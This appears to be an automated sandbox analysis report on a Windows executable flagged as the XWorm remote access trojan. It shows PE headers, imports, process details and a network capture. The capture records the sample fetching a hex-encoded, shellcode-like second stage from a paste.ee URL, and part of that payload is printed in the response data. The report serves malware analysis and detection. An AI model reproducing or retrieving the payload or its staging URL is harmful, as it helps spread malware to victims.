                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      arpl bx, sp
                                      and dword ptr [eax], eax
                                      lodsb
                                      ror byte ptr [eax], cl
                                      add byte ptr [eax], al
                                      add al, 00h
                                      inc esp
                                      jc 00007F92F84CA643h
                                      jnbe 00007F92F84CA5E2h
                                      or eax, 55000801h
                                      xor esi, dword ptr [eax+eax+00h]
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x269d340x28.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2730000x97a24.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x248.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x2696980x26a000053ff183a1caf0587f80f2ee96a4d709unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .data0x26b0000x71a40x1000620f0b67a91f7f74151bc5be745b7110False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x2730000x97a240x980003a8e87ceaefb1b852e315369a32f427bFalse0.15506302682976975data3.0316811696177766IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      EXE0x2734180xa000data1.0005126953125
                                      EXE0x27d4180x2dASCII text, with no line terminators1.1777777777777778
                                      RT_ICON0x27d4480x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.7128378378378378
                                      RT_ICON0x27d5700x368Device independent bitmap graphic, 16 x 32 x 24, image size 8320.8830275229357798
                                      RT_ICON0x27d8d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.8235815602836879
                                      RT_ICON0x27dd400x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.5161290322580645
                                      RT_ICON0x27e0280xca8Device independent bitmap graphic, 32 x 64 x 24, image size 32000.6805555555555556
                                      RT_ICON0x27ecd00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.599671669793621
                                      RT_ICON0x27fd780x668Device independent bitmap graphic, 48 x 96 x 4, image size 15360.375
                                      RT_ICON0x2803e00x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 72960.5612050163576882
                                      RT_ICON0x2820880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.49522821576763487
                                      RT_ICON0x2846300xa68Device independent bitmap graphic, 64 x 128 x 4, image size 25600.29429429429429427
                                      RT_ICON0x2850980x3228Device independent bitmap graphic, 64 x 128 x 24, image size 128000.49478193146417443
                                      RT_ICON0x2882c00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 00.42064241851676903
                                      RT_ICON0x28c4e80xa068Device independent bitmap graphic, 256 x 512 x 4, image size 409600.03253458016754335
                                      RT_ICON0x2965500x32028Device independent bitmap graphic, 256 x 512 x 24, image size 2048000.05124487404803749
                                      RT_ICON0x2c85780x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.04496700890611593
                                      RT_GROUP_ICON0x30a5a00xd8data0.5833333333333334
                                      RT_VERSION0x30a6780x3acdataEnglishUnited States0.5372340425531915
                                      DLLImport
                                      MSVBVM60.DLL__vbaStrI2, _CIcos, _adj_fptan, __vbaVarMove, __vbaVarVargNofree, __vbaAryMove, __vbaFreeVar, __vbaLineInputStr, __vbaLenBstr, __vbaStrVarMove, __vbaEnd, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaCopyBytes, __vbaResume, __vbaStrCat, __vbaVarTextTstEq, __vbaLsetFixstr, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaStrFixstr, __vbaStrTextCmp, __vbaBoolVarNull, _CIsin, __vbaErase, __vbaVarZero, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaI2I4, DllFunctionCall, __vbaLbound, __vbaRedimPreserve, _adj_fpatan, __vbaAryRebase1Var, __vbaFixstrConstruct, __vbaRedim, __vbaDerefAry, __vbaRecUniToAnsi, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, __vbaVarAnd, EVENT_SINK_QueryInterface, __vbaVarTextCmpEq, __vbaUI1I4, __vbaExceptHandler, __vbaPrintFile, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, __vbaI2Var, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaInStr, __vbaVar2Vec, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, __vbaPowerR8, _adj_fdiv_r, __vbaVarAdd, __vbaAryLock, __vbaStrComp, __vbaVarDup, __vbaStrToAnsi, __vbaFpI2, __vbaVarCopy, __vbaFpI4, _CIatan, __vbaStrMove, __vbaStrVarCopy, _allmul, __vbaVarTextCmpNe, _CItan, __vbaUI1Var, __vbaAryUnlock, _CIexp, __vbaI4ErrVar, __vbaFreeObj, __vbaFreeStr
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 21, 2024 21:09:15.163063049 CEST49730443192.168.2.4172.67.187.200
                                      Apr 21, 2024 21:09:15.163114071 CEST44349730172.67.187.200192.168.2.4
                                      Apr 21, 2024 21:09:15.163222075 CEST49730443192.168.2.4172.67.187.200
                                      Apr 21, 2024 21:09:15.173872948 CEST49730443192.168.2.4172.67.187.200
                                      Apr 21, 2024 21:09:15.173887968 CEST44349730172.67.187.200192.168.2.4
                                      Apr 21, 2024 21:09:15.399235964 CEST44349730172.67.187.200192.168.2.4
                                      Apr 21, 2024 21:09:15.399697065 CEST49730443192.168.2.4172.67.187.200
                                      Apr 21, 2024 21:09:15.452105045 CEST49730443192.168.2.4172.67.187.200
                                      Apr 21, 2024 21:09:15.452120066 CEST44349730172.67.187.200192.168.2.4
                                      Apr 21, 2024 21:09:15.452373981 CEST44349730172.67.187.200192.168.2.4
                                      Apr 21, 2024 21:09:15.452575922 CEST49730443192.168.2.4172.67.187.200
                                      Apr 21, 2024 21:09:15.456491947 CEST49730443192.168.2.4172.67.187.200
                                      Apr 21, 2024 21:09:15.504139900 CEST44349730172.67.187.200192.168.2.4
                                      Apr 21, 2024 21:09:15.822719097 CEST44349730172.67.187.200192.168.2.4
                                      Apr 21, 2024 21:09:15.822757959 CEST44349730172.67.187.200192.168.2.4
                                      Apr 21, 2024 21:09:15.822810888 CEST49730443192.168.2.4172.67.187.200
                                      Apr 21, 2024 21:09:15.822825909 CEST44349730172.67.187.200192.168.2.4
                                      Apr 21, 2024 21:09:15.822870970 CEST44349730172.67.187.200192.168.2.4
                                      Apr 21, 2024 21:09:15.823019981 CEST49730443192.168.2.4172.67.187.200
                                      Apr 21, 2024 21:09:15.827477932 CEST49730443192.168.2.4172.67.187.200
                                      Apr 21, 2024 21:09:15.827492952 CEST44349730172.67.187.200192.168.2.4
                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 21, 2024 21:09:15.052742004 CEST6004553192.168.2.41.1.1.1
                                      Apr 21, 2024 21:09:15.158258915 CEST53600451.1.1.1192.168.2.4
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Apr 21, 2024 21:09:15.052742004 CEST192.168.2.41.1.1.10x7ef5Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Apr 21, 2024 21:09:15.158258915 CEST1.1.1.1192.168.2.40x7ef5No error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                      Apr 21, 2024 21:09:15.158258915 CEST1.1.1.1192.168.2.40x7ef5No error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                      • paste.ee
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449730172.67.187.2004436756C:\Users\user\Desktop\E3XzKxHCCb.exe
                                      TimestampBytes transferredDirectionData
                                      2024-04-21 19:09:15 UTC62OUTGET /r/tC4AK HTTP/1.1
                                      User-Agent: Himanen
                                      Host: paste.ee
                                      2024-04-21 19:09:15 UTC1281INHTTP/1.1 200 OK
                                      Date: Sun, 21 Apr 2024 19:09:15 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Cache-Control: max-age=2592000
                                      strict-transport-security: max-age=63072000
                                      x-frame-options: DENY
                                      x-content-type-options: nosniff
                                      x-xss-protection: 1; mode=block
                                      content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                      CF-Cache-Status: MISS
                                      Last-Modified: Sun, 21 Apr 2024 19:09:15 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mj241En%2FT2aGK3QKlZ83DwHIS5WerY6Rb6cT%2BX52buCioeVVOJCrRsLx%2F7cR3uL54Iw4fcWIjsogryMg%2FNmp0Y6yUOxtmiB6VRpUpvWikG9sI74pydgQM%2Fn34w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 877faadc6fecb0db-ATL
                                      alt-svc: h3=":443"; ma=86400
                                      2024-04-21 19:09:15 UTC88INData Raw: 61 31 30 0d 0a 36 30 45 38 34 45 30 30 30 30 30 30 36 42 30 30 36 35 30 30 37 32 30 30 36 45 30 30 36 35 30 30 36 43 30 30 33 33 30 30 33 32 30 30 30 30 30 30 36 45 30 30 37 34 30 30 36 34 30 30 36 43 30 30 36 43 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                                      Data Ascii: a1060E84E0000006B00650072006E0065006C003300320000006E00740064006C006C00000000000000000
                                      2024-04-21 19:09:15 UTC1369INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 35 42 38 42 46 43 36 41 34 32 45 38 42 42 30 33 30 30 30 30 38 42 35 34 32 34 32 38 38 39 31 31 38 42 35 34 32 34 32 43 36 41 33 45 45 38 41 41 30 33 30 30 30 30 38 39 31 31 36 41 34 41 45 38 41 31 30 33 30 30 30 30 38 39 33 39 36 41 31 45 36 41 33 43 45 38 39 44 30 33 30 30 30 30 36 41 32 32 36 38 46 34 30 30 30 30 30 30 45 38 39 31 30 33 30 30 30 30 36 41 32 36 36 41 32 34 45 38 38 38 30 33 30 30 30 30 36 41 32 41 36 41 34 30 45 38 37 46 30 33 30 30 30 30 36 41 32 45 36 41 30 43 45 38 37 36 30 33 30 30
                                      Data Ascii: 00000000000000000000000000000000000000000000000000000000000000000000000000000000000005B8BFC6A42E8BB0300008B54242889118B54242C6A3EE8AA03000089116A4AE8A103000089396A1E6A3CE89D0300006A2268F4000000E8910300006A266A24E8880300006A2A6A40E87F0300006A2E6A0CE8760300
                                      2024-04-21 19:09:15 UTC1126INData Raw: 43 31 36 41 32 45 45 38 33 42 30 31 30 30 30 30 38 42 30 39 35 30 46 46 37 37 31 30 35 36 35 32 46 46 33 31 36 41 30 30 45 38 32 41 30 31 30 30 30 30 36 38 41 31 36 41 33 44 44 38 35 31 45 38 35 36 30 31 30 30 30 30 38 33 43 34 30 43 46 46 44 30 36 41 33 36 45 38 31 33 30 31 30 30 30 30 38 42 31 31 38 33 43 32 30 31 38 39 31 31 36 41 33 41 45 38 30 35 30 31 30 30 30 30 38 42 30 39 33 42 43 41 30 46 38 35 33 33 46 46 46 46 46 46 36 41 33 32 45 38 46 34 30 30 30 30 30 30 38 42 30 39 43 37 30 31 30 37 30 30 30 31 30 30 36 41 30 30 45 38 45 35 30 30 30 30 30 30 36 38 44 32 43 37 41 37 36 38 35 31 45 38 31 31 30 31 30 30 30 30 36 41 33 32 45 38 44 33 30 30 30 30 30 30 38 42 31 31 36 41 32 45 45 38 43 41 30 30 30 30 30 30 38 42 30 39 35 32 46 46 37 31 30 34 46
                                      Data Ascii: C16A2EE83B0100008B0950FF77105652FF316A00E82A01000068A16A3DD851E85601000083C40CFFD06A36E8130100008B1183C20189116A3AE8050100008B093BCA0F8533FFFFFF6A32E8F40000008B09C701070001006A00E8E500000068D2C7A76851E8110100006A32E8D30000008B116A2EE8CA0000008B0952FF7104F
                                      2024-04-21 19:09:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:21:09:07
                                      Start date:21/04/2024
                                      Path:C:\Users\user\Desktop\E3XzKxHCCb.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\E3XzKxHCCb.exe"
                                      Imagebase:0x400000
                                      File size:3'162'112 bytes
                                      MD5 hash:7F77B237F660C6EF5AA674DBE4D3B38F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1970824579.0000000000930000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:3
                                      Start time:21:09:15
                                      Start date:21/04/2024
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6756 -s 1196
                                      Imagebase:0xb80000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:0.4%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:4
                                        Total number of Limit Nodes:0
                                        execution_graph 544 4016e8 #100 545 401248 546 4012a6 545->546 547 40130e __vbaExceptHandler 545->547 546->547

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 4016e8-40170d #100
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1970263552.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1970242697.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1970263552.0000000000412000.00000020.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1970263552.0000000000419000.00000020.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1970263552.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1970263552.000000000044B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1970263552.000000000045E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1970263552.000000000048D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1970263552.000000000061F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1970478741.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1970478741.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1970517844.0000000000673000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1970517844.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1970517844.0000000000695000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1970517844.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1970517844.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1970517844.00000000006D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1970517844.0000000000709000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_E3XzKxHCCb.jbxd
                                        Similarity
                                        • API ID: #100
                                        • String ID:
                                        • API String ID: 1341478452-0
                                        • Opcode ID: 106363715bcb511c6d88c2ca67f11aab0bc643a449b70a3b1bffe191bd977fc2
                                        • Instruction ID: b708d4004a58abdc1b8a6f707902cc465867c3a8aa61aa7f58d1bd6fbfecec5d
                                        • Opcode Fuzzy Hash: 106363715bcb511c6d88c2ca67f11aab0bc643a449b70a3b1bffe191bd977fc2
                                        • Instruction Fuzzy Hash: 36E02B0698F3C14ED30387B059620882F304C032A431E08E7C880CE0E7888A488AC332
                                        Uniqueness

                                        Uniqueness Score: -1.00%